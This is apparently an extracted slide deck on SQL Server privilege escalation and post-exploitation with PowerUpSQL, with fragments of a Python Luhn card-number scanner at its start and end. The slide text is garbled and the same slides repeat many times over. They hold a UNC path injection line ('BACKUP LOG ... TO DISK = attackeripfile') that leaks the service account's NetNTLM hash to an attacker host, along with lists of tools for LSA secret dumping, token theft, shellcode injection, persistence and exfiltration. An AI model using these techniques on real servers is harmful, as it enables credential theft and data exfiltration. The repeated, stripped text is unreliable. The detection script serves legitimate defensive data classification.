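}

if __name__ == "__main__":
    for column, hits in scan_samples(SAMPLE_COLUMNS).items():
        print(f"{column}: {hits} card-like value(s)")
```

On the sample the order-reference column is rejected even though every value is sixteen digits, and the free-text notes column is flagged because a card number is embedded in it, which is the case a keyword-only column search would miss. Raising `min_hits` (or requiring a minimum hit ratio per column) trades recall for fewer false positives on large free-text columns.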
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges UNC Path Injection
Another Issue
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options:

Approach: Access as Local Administrator
Common Tools: Management Studio, sqlcmd, and other native SQL client tools

Approach: Access as LocalSystem
Common Tools: Psexec, accessibility options, or a debugger, combined with native SQL client tools

Approach: Recover SQL Server service account password from LSA Secrets
Common Tools: Mimikatz, Metasploit lsadump

Approach: Inject shellcode or DLL into the SQL Server service process
Common Tools: Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)

Approach: Steal authentication token from SQL Server service process
Common Tools: Metasploit Incognito, Invoke-TokenManipulation

Approach: Single User Mode
Common Tools: DBATools
Post Exploitation Overview: Common Post Exploitation Activities
1. Establish Persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
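Item 2 of the slide above relies on sampling column values and testing them with regular expressions and the Luhn formula. The Python below is an added example written for this page, not PowerUpSQL's own code, showing how such a data-classification check works: a candidate regex pulls 13 to 19 digit runs out of sampled values, the Luhn (mod 10) check discards runs that cannot be card numbers, and the per-column counts show which columns actually hold card data and therefore need encryption and tighter access controls. The column names and sample values are constructed; the card numbers are the publicly documented test numbers, not real accounts.

```python
import re

# Candidate card-number pattern: 13 to 19 digits, optionally separated by
# single spaces or dashes, and not embedded inside a longer digit run.
CARD_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_valid(digits: str) -> bool:
    """Return True if the digit string passes the Luhn (mod 10) check."""
    if not digits.isdigit() or len(digits) < 13:
        return False
    total = 0
    # Walk from the rightmost digit; double every second digit and
    # fold two-digit products back into a single digit.
    for position, char in enumerate(reversed(digits)):
        d = int(char)
        if position % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_card_numbers(text: str) -> list[str]:
    """Return every Luhn-valid candidate found in text, separators stripped."""
    hits = []
    for match in CARD_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", match.group(0))
        if luhn_valid(digits):
            hits.append(digits)
    return hits


def classify_samples(samples: dict[str, list[str]]) -> dict[str, int]:
    """Count, per column, how many sampled values contain a Luhn-valid number.

    `samples` maps a column name to the cell values sampled from it; a
    column with a high count is a candidate for holding card data.
    """
    return {
        column: sum(1 for value in values if find_card_numbers(value))
        for column, values in samples.items()
    }


# Constructed sample data standing in for a TOP-N sample of each column
# (hypothetical column names; the card numbers are public test numbers).
SAMPLE_COLUMNS = {
    "dbo.Orders.CardNo": [
        "4111 1111 1111 1111",   # Visa test number, Luhn-valid
        "378282246310005",       # Amex test number, Luhn-valid
        "n/a",
    ],
    "dbo.Orders.OrderId": [
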